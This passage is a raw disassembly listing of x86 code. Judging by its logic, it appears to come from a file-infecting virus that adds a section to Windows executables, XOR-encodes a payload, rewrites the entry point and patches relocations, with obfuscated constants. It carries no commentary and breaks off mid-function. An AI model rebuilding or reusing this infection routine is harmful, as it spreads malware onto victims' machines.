mov [ebp+var_105C], eax
loc_441245: ; CODE XREF: sub_440F46+2E0�j
; sub_440F46+2E8�j
mov eax, [ebp+var_430]
mov edx, [esi+0Ch]
cmp eax, edx
jb short loc_441265
add edx, [esi+8]
cmp eax, edx
jnb short loc_441265
sub eax, [esi+0Ch]
add eax, [esi+14h]
mov [ebp+var_844], eax
loc_441265: ; CODE XREF: sub_440F46+30A�j
; sub_440F46+311�j
inc [ebp+var_434]
loc_44126B: ; CODE XREF: sub_440F46+25E�j
mov eax, [ebp+var_8]
movzx eax, word ptr [eax+6]
cmp [ebp+var_434], eax
jb loc_4411A9
mov eax, dword_44A18C
add eax, 1000h
push eax
push [ebp+var_20]
call sub_43CC87
add esp, 8
mov [ebp+var_20], eax
cmp [ebp+var_1180], 0
jz short loc_4412A9
mov eax, [ebp+var_C54]
mov [ebp+var_10], eax
loc_4412A9: ; CODE XREF: sub_440F46+358�j
mov eax, [ebp+var_C54]
cmp [ebp+var_10], eax
jz short loc_4412CC
mov eax, [ebp+var_8]
mov edx, dword_44A0C4
sub edx, 7
cmp [eax+0A8h], edx
jz loc_442422
loc_4412CC: ; CODE XREF: sub_440F46+36C�j
mov eax, dword_44A0F8
sub eax, 7
cmp [ebp+var_105C], eax
jz loc_4413AB
mov eax, dword_44A280
add eax, dword_44A14C
sub eax, 0Ah
mov [ebp+var_31F10], eax
mov eax, dword_44A194
sub eax, 9
mov [ebp+var_31F08], eax
jmp short loc_441352
; ---------------------------------------------------------------------------
loc_441304: ; CODE XREF: sub_440F46+432�j
mov eax, [ebp+var_105C]
mov [ebp+var_31F14], eax
mov eax, 1Ch
mul [ebp+var_31F08]
mov [ebp+var_31F18], eax
mov eax, [ebp+var_31F14]
mov edx, [ebp+var_31F18]
add eax, edx
add eax, [ebp+var_4]
mov [ebp+var_31F0C], eax
mov edx, [ebp+var_31F10]
cmp [eax+18h], edx
jbe short loc_44134C
mov eax, [eax+18h]
mov [ebp+var_31F10], eax
loc_44134C: ; CODE XREF: sub_440F46+3FB�j
inc [ebp+var_31F08]
loc_441352: ; CODE XREF: sub_440F46+3BC�j
mov edi, [ebp+var_8]
mov eax, [edi+0ACh]
mov ecx, 1Ch
shr eax, 2
mov edx, 24924925h
mul edx
mov [ebp+var_31F14], edx
mov edi, edx
cmp [ebp+var_31F08], edi
jb short loc_441304
mov eax, [ebp+var_8]
push dword ptr [eax+3Ch]
push [ebp+var_31F10]
call sub_43CC87
add esp, 8
mov [ebp+var_31F10], eax
mov eax, [ebp+var_C54]
cmp eax, [ebp+var_10]
jz short loc_4413AB
cmp [ebp+var_31F10], eax
jnz loc_442422
loc_4413AB: ; CODE XREF: sub_440F46+394�j
; sub_440F46+457�j
and [ebp+var_1174], 0
mov eax, dword_44A188
mov [ebp+var_438], eax
jmp loc_441505
; ---------------------------------------------------------------------------
loc_4413C2: ; CODE XREF: sub_440F46+5CE�j
mov eax, [ebp+var_844]
add eax, [ebp+var_438]
add eax, [ebp+var_4]
mov [ebp+var_3200C], eax
mov edx, dword_44A0EC
sub edx, 4
cmp [eax], edx
jz loc_44151A
mov eax, [ebp+var_3200C]
mov eax, [eax+0Ch]
sub eax, [ebp+var_430]
add eax, [ebp+var_844]
mov [ebp+var_32010], eax
add eax, [ebp+var_4]
push eax
lea eax, [ebp+var_32007]
push eax
call ds:dword_4461F4
add esp, 8
mov eax, dword_44A0C8
mov [ebp+var_31F08], eax
jmp short loc_44144F
; ---------------------------------------------------------------------------
loc_441424: ; CODE XREF: sub_440F46+52C�j
mov eax, [ebp+var_31F08]
mov al, [ebp+eax+var_32007]
cmp al, 61h
jle short loc_441449
cmp al, 7Ah
jge short loc_441449
mov eax, [ebp+var_31F08]
lea eax, [ebp+eax+var_32007]
sub byte ptr [eax], 20h
loc_441449: ; CODE XREF: sub_440F46+4ED�j
; sub_440F46+4F1�j
inc [ebp+var_31F08]
loc_44144F: ; CODE XREF: sub_440F46+4DC�j
mov eax, [ebp+var_31F08]
movsx eax, [ebp+eax+var_32007]
movsx edx, word_44A104
movsx ecx, word_44A0A4
add edx, ecx
sub edx, 0Eh
cmp eax, edx
jnz short loc_441424
movsx eax, word_44A0FC
movsx edx, word_44A0B0
add eax, edx
cmp [ebp+eax+var_32014], 4Bh
jnz short loc_4414FE
movsx eax, word_44A160
movsx edx, word_44A27C
add eax, edx
cmp byte ptr [ebp+eax+var_3200C+1], 45h
jnz short loc_4414FE
mov eax, dword_44A204
cmp [ebp+eax+var_32006], 52h
jnz short loc_4414FE
mov eax, dword_44A12C
mov edx, dword_44A17C
add edx, eax
cmp byte ptr [ebp+edx+var_32010+1], 4Ch
jnz short loc_4414FE
mov edx, dword_44A1F4
add edx, dword_44A234
cmp byte ptr [ebp+edx+var_3200C+3], 33h
jnz short loc_4414FE
add eax, dword_44A158
cmp [ebp+eax+var_32011], 32h
jnz short loc_4414FE
mov [ebp+var_1174], 1
loc_4414FE: ; CODE XREF: sub_440F46+546�j
; sub_440F46+560�j ...
add [ebp+var_438], 14h
loc_441505: ; CODE XREF: sub_440F46+477�j
mov eax, [ebp+var_8]
mov eax, [eax+84h]
cmp [ebp+var_438], eax
jb loc_4413C2
loc_44151A: ; CODE XREF: sub_440F46+49C�j
cmp [ebp+var_1174], 0
jz loc_442422
lea eax, [ebp+var_31EC7]
mov [ebp+var_42C], eax
mov eax, [eax+3Ch]
mov [ebp+var_84C], eax
add eax, [ebp+var_42C]
mov [ebp+var_848], eax
cmp [ebp+var_1180], 0
jnz loc_4416EE
mov eax, [ebp+var_8]
mov [ebp+var_31F08], eax
mov edx, dword_44A1AC
sub edx, 5
cmp [eax+0D0h], edx
jz loc_4416EE
mov edx, [eax+0D4h]
mov [ebp+var_31F0C], edx
mov ecx, dword_44A11C
movsx edi, word_44A218
add ecx, edi
sub ecx, 0Ah
cmp edx, ecx
jz loc_4416EE
mov ecx, 28h
mov edi, [ebp+var_840]
add edi, 0F8h
mov eax, ecx
mov edx, [ebp+var_31F08]
movzx edx, word ptr [edx+6]
mov [ebp+var_31F10], edx
mul edx
mov [ebp+var_31F14], eax
mov edx, edi
add edx, eax
mov [ebp+var_31F1C], edx
mov eax, ecx
mov [ebp+var_31F18], eax
mov ecx, dword_44A138
add ecx, 4
mul ecx
mov [ebp+var_31F20], eax
mov eax, [ebp+var_31F1C]
mov edx, [ebp+var_31F20]
add eax, edx
mov edx, [ebp+var_31F0C]
add eax, edx
mov edx, [ebp+var_31F08]
cmp [edx+54h], eax
jbe loc_4416EE
mov eax, [ebp+var_840]
add eax, 0F8h
mov [ebp+var_31F2C], eax
mov eax, 28h
mov ecx, [ebp+var_8]
movzx ecx, word ptr [ecx+6]
mul ecx
mov [ebp+var_31F30], eax
mov eax, [ebp+var_31F2C]
mov edx, [ebp+var_31F30]
add eax, edx
mov [ebp+var_31F24], eax
mov [ebp+var_31F34], eax
mov eax, 28h
mov ecx, [ebp+var_848]
movzx ecx, word ptr [ecx+6]
mov edi, dword_44A1E4
add edi, dword_44A224
sub edi, 7
sub ecx, edi
mul ecx
mov [ebp+var_31F38], eax
mov eax, [ebp+var_31F34]
mov edx, [ebp+var_31F38]
add eax, edx
mov [ebp+var_31F28], eax
mov eax, [ebp+var_8]
push dword ptr [eax+0D4h]
mov eax, [ebp+var_4]
mov edx, [ebp+var_31F24]
add edx, eax
push edx
mov edx, [ebp+var_31F28]
add edx, eax
push edx
call ds:dword_448638
add esp, 0Ch
mov eax, [ebp+var_8]
add eax, 0D0h
mov [ebp+var_31F3C], eax
mov eax, 28h
mov ecx, [ebp+var_848]
movzx ecx, word ptr [ecx+6]
mov edi, dword_44A140
sub edi, 7
sub ecx, edi
mul ecx
mov [ebp+var_31F40], eax
mov eax, [ebp+var_31F3C]
mov edx, eax
mov ecx, [ebp+var_31F40]
add [edx], ecx
loc_4416EE: ; CODE XREF: sub_440F46+609�j
; sub_440F46+627�j ...
mov eax, [ebp+var_8]
push dword ptr [eax+3Ch]
push [ebp+var_10]
call sub_43CC87
mov [ebp+var_10], eax
mov eax, 28h
mov ecx, [ebp+var_8]
movzx ecx, word ptr [ecx+6]
mul ecx
mov [ebp+var_31F24], eax
mov eax, [ebp+var_840]
mov edx, [ebp+var_4]
lea eax, [eax+edx+0F8h]
mov edx, [ebp+var_31F24]
mov esi, edx
add esi, eax
push offset dword_44A81C
call sub_43C507
push eax
push esi
call ds:dword_4461F4
mov eax, dword_44A234
add eax, 1FFFCh
mov [esi+8], eax
mov eax, [ebp+var_20]
mov [esi+0Ch], eax
mov eax, [ebp+var_8]
push dword ptr [eax+3Ch]
mov eax, [ebp+arg_8]
add eax, 0Dh
push eax
call sub_43CC87
mov [esi+10h], eax
mov eax, [ebp+var_10]
mov [esi+14h], eax
mov eax, dword_44A204
add eax, 0C000003Fh
mov [esi+24h], eax
movsx eax, word_44A144
mov edx, dword_44A278
lea eax, [eax+edx+4]
push eax
mov eax, dword_44A210
mov edx, eax
add edx, eax
mov eax, edx
sub eax, 2
push eax
mov eax, esi
add eax, 18h
push eax
call ds:dword_448644
mov eax, [ebp+var_20]
mov [ebp+var_1060], eax
mov eax, [ebp+var_10]
mov [ebp+var_850], eax
mov eax, [ebp+var_8]
push dword ptr [eax+3Ch]
mov eax, [ebp+var_10]
add eax, [esi+10h]
push eax
call sub_43CC87
add esp, 30h
mov [ebp+var_10], eax
movsx eax, word_44A208
add eax, 1FFFBh
add [ebp+var_20], eax
mov eax, [ebp+var_8]
add eax, 6
inc word ptr [eax]
mov eax, [ebp+var_8]
mov edx, [esi+0Ch]
add edx, [esi+8]
mov [eax+50h], edx
call ds:dword_449BAC
mov edi, dword_44A164
sub edi, 3
mov ecx, 0FDh
cdq
idiv ecx
add edi, edx
mov [ebp+var_1064], edi
mov eax, dword_44A248
mov edx, [ebp+var_42C]
mov ecx, edi
xor ecx, 4Dh
mov [edx+eax], cl
movsx edi, word_44A130
movsx edx, word_44A0C0
add edi, edx
sub edi, 4
mov edx, [ebp+var_42C]
mov ecx, [ebp+arg_8]
shr ecx, 9
mov [edx+edi], cl
call ds:dword_449BAC
mov edi, [ebp+var_84C]
mov edx, [ebp+var_42C]
mov [ebp+var_31F2C], edx
mov [ebp+var_31F28], eax
mov ecx, 0FFh
cdq
idiv ecx
mov ecx, [ebp+var_31F2C]
mov [ecx+edi], dl
call ds:dword_449BAC
movsx edx, word_44A260
add edx, dword_44A21C
sub edx, 9
add edi, edx
mov edx, [ebp+var_42C]
mov [ebp+var_31F34], edx
mov [ebp+var_31F30], eax
mov ecx, 0FFh
cdq
idiv ecx
mov ecx, [ebp+var_31F34]
mov [ecx+edi], dl
mov eax, dword_44A0B4
add eax, 34h
movsx edx, word_44A178
add eax, edx
mov [ebp+var_43C], eax
jmp short loc_441901
; ---------------------------------------------------------------------------
loc_4418CC: ; CODE XREF: sub_440F46+9C7�j
call ds:dword_449BAC
mov edi, [ebp+var_43C]
mov edx, [ebp+var_42C]
mov [ebp+var_31F3C], edx
mov [ebp+var_31F38], eax
mov ecx, 0FFh
cdq
idiv ecx
mov ecx, [ebp+var_31F3C]
mov [ecx+edi], dl
inc [ebp+var_43C]
loc_441901: ; CODE XREF: sub_440F46+984�j
mov eax, [ebp+var_84C]
cmp [ebp+var_43C], eax
jb short loc_4418CC
cmp [ebp+var_1180], 0
jz short loc_441990
mov eax, [ebp+var_8]
mov edx, [eax+34h]
add edx, [eax+28h]
mov eax, dword_44A17C
movsx ecx, word_44A1FC
add eax, ecx
sub eax, 3
add edx, eax
mov [ebp+var_31F40], edx
mov eax, [ebp+var_850]
add eax, dword_44A25C
mov edx, [ebp+var_4]
mov eax, [edx+eax]
mov [ebp+var_31F44], eax
movsx edx, word_44A250
mov ecx, dword_44A0DC
lea edx, [edx+ecx-5]
sub eax, edx
add eax, [ebp+var_31F40]
movsx edx, word_44A100
add edx, dword_44A1A8
dec edx
add eax, edx
mov [ebp+var_31F48], eax
mov eax, [ebp+var_8]
mov edx, [ebp+var_31F48]
sub edx, [eax+34h]
mov [eax+28h], edx
loc_441990: ; CODE XREF: sub_440F46+9D0�j
push 0Dh
push offset dword_44A2C0
lea eax, [ebp+var_31ED4]
push eax
call ds:dword_448638
mov eax, [esi+10h]
add eax, 0Dh
push eax
lea eax, [ebp+var_31ED4]
push eax
mov eax, [esi+14h]
add eax, [ebp+var_4]
push eax
call ds:dword_448638
add esp, 18h
mov eax, [esi+14h]
add eax, 0Dh
mov [ebp+var_1068], eax
movsx edx, word_44A218
sub edx, 3
add eax, edx
mov [ebp+var_424], eax
jmp short loc_4419FC
; ---------------------------------------------------------------------------
loc_4419E2: ; CODE XREF: sub_440F46+AC5�j
mov eax, [ebp+var_424]
add eax, [ebp+var_4]
movzx edx, byte ptr [eax]
xor edx, [ebp+var_1064]
mov [eax], dl
inc [ebp+var_424]
loc_4419FC: ; CODE XREF: sub_440F46+A9A�j
mov eax, [ebp+var_1068]
add eax, [ebp+arg_8]
cmp [ebp+var_424], eax
jb short loc_4419E2
mov eax, dword_44A1EC
sub eax, 8
mov [ebp+var_18], eax
mov eax, dword_44A1E8
dec eax
mov [ebp+var_440], eax
jmp loc_441C6A
; ---------------------------------------------------------------------------
loc_441A29: ; CODE XREF: sub_440F46+D34�j
mov eax, 28h
mul [ebp+var_440]
mov [ebp+var_31F44], eax
mov eax, [ebp+var_84C]
mov edx, [ebp+var_42C]
lea eax, [eax+edx+0F8h]
mov edx, [ebp+var_31F44]
mov ebx, edx
add ebx, eax
mov eax, 28h
mov ecx, [ebp+var_8]
movzx ecx, word ptr [ecx+6]
mul ecx
mov [ebp+var_31F48], eax
mov eax, [ebp+var_840]
mov edx, [ebp+var_4]
lea eax, [eax+edx+0F8h]
mov edx, [ebp+var_31F48]
mov esi, edx
add esi, eax
mov eax, dword_44A184
add eax, dword_44A094
sub eax, 8
cmp byte ptr [ebx+eax], 2Eh
jnz short loc_441AC1
mov eax, dword_44A228
sub eax, 2
cmp byte ptr [ebx+eax], 72h
jnz short loc_441AC1
mov eax, dword_44A1CC
dec eax
cmp byte ptr [ebx+eax], 63h
jnz short loc_441AC1
mov eax, [ebx+14h]
mov [ebp+var_1178], eax
jmp loc_441C64
; ---------------------------------------------------------------------------
loc_441AC1: ; CODE XREF: sub_440F46+B51�j
; sub_440F46+B5F�j ...
mov eax, dword_44A0D4
movsx edx, word_44A1FC
add eax, edx
sub eax, 0Bh
cmp byte ptr [ebx+eax], 2Eh
jnz short loc_441B19
movsx eax, word_44A118
add eax, dword_44A17C
sub eax, 7
cmp byte ptr [ebx+eax], 65h
jnz short loc_441B19
mov eax, dword_44A0AC
add eax, dword_44A26C
sub eax, 5
cmp byte ptr [ebx+eax], 61h
jnz short loc_441B19
mov eax, [ebx+14h]
mov [ebp+var_117C], eax
mov eax, [ebx+0Ch]
mov [ebp+var_1184], eax
jmp loc_441C64
; ---------------------------------------------------------------------------
loc_441B19: ; CODE XREF: sub_440F46+B90�j
; sub_440F46+BA6�j ...
mov eax, dword_44A094
mov edx, eax
sub edx, 6
cmp byte ptr [ebx+edx], 2Eh
jnz short loc_441B4A
movsx edx, word_44A218
sub edx, 4
cmp byte ptr [ebx+edx], 69h
jnz short loc_441B4A
add eax, dword_44A188
dec eax
cmp byte ptr [ebx+eax], 61h
jz loc_441C64
loc_441B4A: ; CODE XREF: sub_440F46+BE1�j
; sub_440F46+BF1�j
push ebx
push esi
call ds:dword_4461F4
mov eax, [ebx+8]
mov [esi+8], eax
mov eax, [ebp+var_20]
mov [esi+0Ch], eax
mov eax, [ebx+10h]
mov [esi+10h], eax
mov eax, [ebp+var_10]
mov [esi+14h], eax
mov eax, [ebx+24h]
mov [esi+24h], eax
mov eax, dword_44A280
add eax, 8
push eax
mov eax, dword_44A198
sub eax, 2
push eax
mov eax, esi
add eax, 18h
push eax
call ds:dword_448644
mov edi, [ebp+var_18]
mov edx, [ebx+0Ch]
mov [ebp+edi*4+var_420], edx
mov edx, [ebx+8]
mov [ebp+edi*4+var_83C], edx
mov edx, [esi+0Ch]
mov [ebp+edi*4+var_C4C], edx
mov edx, [esi+14h]
mov [ebp+edi*4+var_1050], edx
inc [ebp+var_18]
mov eax, [ebx+10h]
add [ebp+var_10], eax
mov eax, [ebp+var_10]
mov [ebp+var_31F40], eax
mov eax, [ebp+var_8]
push dword ptr [eax+3Ch]
push [ebp+var_10]
call sub_43CC87
add esp, 1Ch
mov [ebp+var_10], eax
mov eax, dword_44A0B8
sub eax, 2
cmp byte ptr [ebx+eax], 64h
jnz short loc_441C0D
mov eax, [ebp+var_31F40]
cmp [ebp+var_10], eax
jbe short loc_441C0D
mov ecx, [ebp+var_10]
sub ecx, eax
mov [ebp+var_31F4C], ecx
mov eax, ecx
add [esi+8], eax
mov eax, ecx
add [esi+10h], eax
loc_441C0D: ; CODE XREF: sub_440F46+CA5�j
; sub_440F46+CB0�j
movsx eax, word_44A250
movsx edx, word_44A180
lea eax, [eax+edx+0FFBh]
push eax
mov eax, [ebp+var_20]
add eax, [ebx+8]
push eax
call sub_43CC87
mov [ebp+var_20], eax
mov eax, [ebp+var_8]
add eax, 6
inc word ptr [eax]
mov eax, [ebp+var_8]
mov edx, [esi+0Ch]
add edx, [ebx+8]
mov [eax+50h], edx
push dword ptr [esi+10h]
mov eax, [ebx+14h]
add eax, [ebp+var_42C]
push eax
mov eax, [esi+14h]
add eax, [ebp+var_4]
push eax
call ds:dword_448638
add esp, 14h
loc_441C64: ; CODE XREF: sub_440F46+B76�j
; sub_440F46+BCE�j ...
inc [ebp+var_440]
loc_441C6A: ; CODE XREF: sub_440F46+ADE�j
mov eax, [ebp+var_848]
movzx eax, word ptr [eax+6]
cmp [ebp+var_440], eax
jb loc_441A29
mov eax, [ebp+var_1178]
add eax, [ebp+var_42C]
mov [ebp+var_14], eax
loc_441C8F: ; CODE XREF: sub_440F46+F90�j
mov eax, dword_44A134
movsx edx, word_44A150
add eax, edx
sub eax, 10h
mov [ebp+var_1C], eax
jmp short loc_441D01
; ---------------------------------------------------------------------------
loc_441CA5: ; CODE XREF: sub_440F46+DC1�j
mov edi, [ebp+var_1C]
mov edx, [ebp+var_14]
mov edx, [edx]
cmp [ebp+edi*4+var_420], edx
jnz short loc_441CC1
mov eax, [ebp+var_14]
mov eax, [eax]
mov [ebp+var_C50], eax
loc_441CC1: ; CODE XREF: sub_440F46+D6E�j
mov edi, [ebp+var_1C]
shl edi, 2
mov edx, [ebp+edi+var_420]
add edx, [ebp+edi+var_83C]
mov edi, [ebp+var_14]
cmp edx, [edi]
jbe short loc_441CFE
mov edi, [ebp+var_1C]
mov edi, [ebp+edi*4+var_1050]
mov [ebp+var_106C], edi
mov edi, [ebp+var_1C]
mov edi, [ebp+edi*4+var_C4C]
mov [ebp+var_1054], edi
jmp short loc_441D09
; ---------------------------------------------------------------------------
loc_441CFE: ; CODE XREF: sub_440F46+D94�j
inc [ebp+var_1C]
loc_441D01: ; CODE XREF: sub_440F46+D5D�j
mov eax, [ebp+var_18]
cmp [ebp+var_1C], eax
jb short loc_441CA5
loc_441D09: ; CODE XREF: sub_440F46+DB6�j
mov eax, dword_44A15C
add eax, dword_44A154
sub eax, 10h
mov [ebp+var_428], eax
jmp loc_441E9C
; ---------------------------------------------------------------------------
loc_441D22: ; CODE XREF: sub_440F46+F62�j
mov eax, [ebp+var_428]
mov edx, dword_44A28C
movsx ecx, word_44A264
add edx, ecx
sub edx, 7
add eax, edx
add eax, [ebp+var_14]
mov [ebp+var_31F44], eax
mov ax, [eax]
mov word ptr [ebp+var_31F40], ax
movzx eax, word ptr [ebp+var_31F40]
mov edx, dword_44A224
add edx, dword_44A18C
sub edx, 5
cmp eax, edx
jz loc_441EAE
movzx edi, word ptr [ebp+var_31F40]
movsx edx, word_44A178
mov ecx, dword_44A1B0
lea ecx, [edx+ecx+1]
sar edi, cl
mov word ptr [ebp+var_31F48+2], di
movzx edi, word ptr [ebp+var_31F40]
movsx ecx, word_44A178
shl edi, cl
mov word ptr [ebp+var_31F40+2], di
movzx edi, word ptr [ebp+var_31F40+2]
movsx edx, word_44A0D8
add edx, dword_44A12C
mov ecx, edx
sub ecx, 6
sar edi, cl
mov word ptr [ebp+var_31F40+2], di
movzx eax, word ptr [ebp+var_31F40+2]
movsx edx, word_44A0B0
sub edx, 7
cmp eax, edx
jnz short loc_441DF6
mov eax, dword_44A18C
add eax, dword_44A0A0
sub eax, 4
cmp [ebp+var_428], eax
jnz loc_441EAE
loc_441DF6: ; CODE XREF: sub_440F46+E94�j
mov eax, [ebp+var_848]
mov eax, [eax+34h]
mov edx, [ebp+var_14]
add eax, [edx]
movzx edx, word ptr [ebp+var_31F40+2]
add eax, edx
mov [ebp+var_31F4C], eax
mov eax, [ebp+var_8]
mov eax, [eax+34h]
add eax, [ebp+var_1054]
mov edx, [ebp+var_14]
add eax, [edx]
sub eax, [ebp+var_C50]
movzx edx, word ptr [ebp+var_31F40+2]
add eax, edx
mov [ebp+var_31F50], eax
sub eax, [ebp+var_31F4C]
mov [ebp+var_31F54], eax
movzx eax, word ptr [ebp+var_31F48+2]
movsx edx, word_44A1F0
movsx ecx, word_44A250
add edx, ecx
dec edx
cmp eax, edx
jnz short loc_441E8C
mov eax, [ebp+var_106C]
mov edx, [ebp+var_14]
add eax, [edx]
sub eax, [ebp+var_C50]
movzx edx, word ptr [ebp+var_31F40+2]
add eax, edx
add eax, [ebp+var_4]
mov [ebp+var_31F58], eax
mov edx, [ebp+var_31F54]
add [eax], edx
loc_441E8C: ; CODE XREF: sub_440F46+F19�j
movsx eax, word_44A178
sub eax, 2
add [ebp+var_428], eax
loc_441E9C: ; CODE XREF: sub_440F46+DD7�j
mov eax, [ebp+var_14]
mov eax, [eax+4]
cmp [ebp+var_428], eax
jb loc_441D22
loc_441EAE: ; CODE XREF: sub_440F46+E21�j
; sub_440F46+EAA�j
mov eax, [ebp+var_14]
mov edx, [eax+4]
add edx, eax
mov [ebp+var_14], edx
mov eax, [ebp+var_848]
mov eax, [eax+0A4h]
mov edx, [ebp+var_1178]
add edx, [ebp+var_42C]
add eax, edx
cmp [ebp+var_14], eax
jb loc_441C8F
mov eax, [ebp+var_8]
mov ecx, [eax+28h]
mov [ebp+var_1188], ecx
mov edx, [ebp+var_1060]
mov [eax+28h], edx
cmp [ebp+var_1180], 0
jnz short loc_441F19
add eax, 60h
mov edx, [ebp+var_848]
mov edx, [edx+60h]
add [eax], edx
mov eax, [ebp+var_8]
add eax, 68h
mov edx, [ebp+var_848]
mov edx, [edx+68h]
add [eax], edx
loc_441F19: ; CODE XREF: sub_440F46+FB2�j
mov eax, [ebp+var_8]
mov edx, dword_44A09C
add edx, 4
movsx ecx, word_44A178
add edx, ecx
mov [eax+44h], dx
mov edx, dword_44A0EC
add edx, dword_44A0A8
sub edx, 2
mov [eax+1Ah], dl
mov edx, dword_44A1B8
add edx, dword_44A184
sub edx, 5
mov [eax+46h], dx
mov eax, [ebp+var_117C]
add eax, [ebp+var_42C]
mov [ebp+var_31EE0], eax
mov eax, [ebp+var_117C]
mov edx, [ebp+var_31EE0]
add eax, [edx+1Ch]
sub eax, [ebp+var_1184]
mov [ebp+var_31EE4], eax
add eax, [ebp+var_42C]
mov [ebp+var_31EE8], eax
mov eax, [eax]
mov [ebp+var_1058], eax
mov eax, dword_44A0DC
sub eax, 3
mov [ebp+var_24], eax
jmp short loc_441FE6
; ---------------------------------------------------------------------------
loc_441FA5: ; CODE XREF: sub_440F46+10A6�j
mov edi, [ebp+var_24]
shl edi, 2
mov edx, [ebp+edi+var_420]
add edx, [ebp+edi+var_83C]
cmp edx, [ebp+var_1058]
jbe short loc_441FE3
mov edi, [ebp+var_24]
mov edi, [ebp+edi*4+var_420]
mov [ebp+var_118C], edi
mov edi, [ebp+var_24]
mov edi, [ebp+edi*4+var_C4C]
mov [ebp+var_1194], edi
jmp short loc_441FEE
; ---------------------------------------------------------------------------
loc_441FE3: ; CODE XREF: sub_440F46+1079�j
inc [ebp+var_24]
loc_441FE6: ; CODE XREF: sub_440F46+105D�j
mov eax, [ebp+var_18]
cmp [ebp+var_24], eax
jb short loc_441FA5
loc_441FEE: ; CODE XREF: sub_440F46+109B�j
mov eax, [ebp+var_8]
mov eax, [eax+34h]
add eax, [ebp+var_1194]
add eax, [ebp+var_1058]
sub eax, [ebp+var_118C]
mov [ebp+var_1190], eax
mov eax, [ebp+var_848]
mov eax, [eax+34h]
add eax, [ebp+var_1058]
mov [ebp+var_1058], eax
mov eax, [ebp+var_850]
mov [ebp+var_C], eax
jmp loc_4422F4
; ---------------------------------------------------------------------------
loc_44202F: ; CODE XREF: sub_440F46+13BA�j
mov eax, [ebp+var_C]
mov edx, [ebp+var_4]
mov [ebp+var_31F40], edx
movzx ecx, byte ptr [edx+eax]
mov edi, dword_44A26C
add edi, 0E0h
cmp ecx, edi
jnz loc_442187
mov ecx, dword_44A1E8
mov edi, eax
add edi, ecx
movzx ecx, byte ptr [edx+edi]
movsx edi, word_44A170
add edi, dword_44A1D0
sub edi, 9
cmp ecx, edi
jnz loc_442187
movsx ecx, word_44A0B0
sub ecx, 5
mov edi, eax
add edi, ecx
movzx ecx, byte ptr [edx+edi]
mov edi, dword_44A090
movsx edx, word_44A174
add edi, edx
mov edx, edi
sub edx, 0Ah
cmp ecx, edx
jnz loc_442187
mov edx, dword_44A1E8
add edx, 2
mov ecx, eax
add ecx, edx
mov edx, [ebp+var_31F40]
movzx edx, byte ptr [edx+ecx]
movsx ecx, word_44A264
movsx edi, word_44A230
add ecx, edi
sub ecx, 0Fh
cmp edx, ecx
jnz loc_442187
movsx edx, word_44A100
inc edx
add eax, edx
mov edx, [ebp+var_31F40]
movzx eax, byte ptr [edx+eax]
movsx edx, word_44A260
sub edx, 2
cmp eax, edx
jnz loc_442187
mov eax, [ebp+var_8]
mov eax, [eax+34h]
add eax, [ebp+var_1060]
mov edx, [ebp+var_C]
sub edx, [ebp+var_850]
add eax, edx
mov [ebp+var_31F44], eax
mov eax, [ebp+var_8]
mov eax, [eax+34h]
add eax, [ebp+var_1188]
mov [ebp+var_31F48], eax
movsx eax, word_44A180
add eax, 0FFFFFFFBh
sub eax, [ebp+var_31F44]
add eax, [ebp+var_31F48]
mov edx, dword_44A274
inc edx
movsx ecx, word_44A0C0
add edx, ecx
sub eax, edx
mov [ebp+var_31F4C], eax
movsx edi, word_44A0C0
movsx edx, word_44A150
add edi, edx
mov edx, [ebp+var_C]
mov ecx, dword_44A238
inc ecx
add ecx, dword_44A0C8
add edx, ecx
add edx, [ebp+var_4]
mov ecx, eax
mov [edx+edi*4-28h], ecx
loc_442187: ; CODE XREF: sub_440F46+1107�j
; sub_440F46+112D�j ...
mov eax, [ebp+var_C]
mov edx, [ebp+var_4]
mov [ebp+var_31F44], edx
movzx ecx, byte ptr [edx+eax]
movsx edi, word_44A1E0
mov edx, dword_44A128
lea edx, [edi+edx+0DCh]
cmp ecx, edx
jnz loc_4422F1
mov edx, dword_44A0A0
sub edx, 3
mov ecx, eax
add ecx, edx
mov edx, [ebp+var_31F44]
movzx edx, byte ptr [edx+ecx]
movsx ecx, word_44A24C
sub ecx, 9
cmp edx, ecx
jnz loc_4422F1
mov edx, dword_44A18C
movsx ecx, word_44A22C
add edx, ecx
sub edx, 5
mov ecx, eax
add ecx, edx
mov edx, [ebp+var_31F44]
movzx edx, byte ptr [edx+ecx]
mov ecx, dword_44A1E4
movsx edi, word_44A150
add ecx, edi
sub ecx, 0Ch
cmp edx, ecx
jnz loc_4422F1
mov edx, dword_44A210
movsx ecx, word_44A104
add ecx, edx
sub ecx, 6
mov edi, eax
add edi, ecx
mov ecx, [ebp+var_31F44]
movzx ecx, byte ptr [ecx+edi]
mov edi, dword_44A25C
sub edi, 8
cmp ecx, edi
jnz loc_4422F1
movsx ecx, word_44A250
lea edx, [edx+ecx+2]
add eax, edx
mov edx, [ebp+var_31F44]
movzx eax, byte ptr [edx+eax]
movsx edx, word_44A264
add edx, dword_44A17C
sub edx, 0Eh
cmp eax, edx
jnz short loc_4422F1
mov eax, [ebp+var_8]
mov eax, [eax+34h]
add eax, [ebp+var_1060]
mov edx, [ebp+var_C]
sub edx, [ebp+var_850]
add eax, edx
mov [ebp+var_31F48], eax
mov eax, [ebp+var_1190]
mov [ebp+var_31F4C], eax
mov eax, dword_44A1AC
add eax, 0FFFFFFFAh
sub eax, [ebp+var_31F48]
add eax, [ebp+var_31F4C]
movsx edx, word_44A178
add edx, dword_44A0A0
sub edx, 4
sub eax, edx
mov [ebp+var_31F50], eax
movsx edi, word_44A150
add edi, dword_44A09C
mov edx, [ebp+var_C]
mov ecx, dword_44A268
add ecx, dword_44A11C
sub ecx, 8
add edx, ecx
add edx, [ebp+var_4]
mov ecx, eax
mov [edx+edi*4-34h], ecx
loc_4422F1: ; CODE XREF: sub_440F46+1267�j
; sub_440F46+1290�j ...
inc [ebp+var_C]
loc_4422F4: ; CODE XREF: sub_440F46+10E4�j
mov eax, [ebp+var_850]
add eax, 0Dh
cmp [ebp+var_C], eax
jb loc_44202F
push [ebp+var_1070]
call ds:dword_448654 ; CloseHandle
push [ebp+arg_0]
lea eax, [ebp+var_116F]
push eax
call ds:dword_4461F4
add esp, 8
lea ecx, [ebp+var_116F]
or eax, 0FFFFFFFFh
loc_44232E: ; CODE XREF: sub_440F46+13ED�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_44232E
mov [ebp+var_31ED8], eax
movsx edx, word_44A0A4
sub edx, 3
sub eax, edx
mov [ebp+eax+var_116F], 69h
mov eax, [ebp+var_31ED8]
mov edx, dword_44A23C
add edx, dword_44A154
sub edx, 0Ah
sub eax, edx
mov [ebp+eax+var_116F], 76h
mov eax, [ebp+var_31ED8]
movsx edx, word_44A1FC
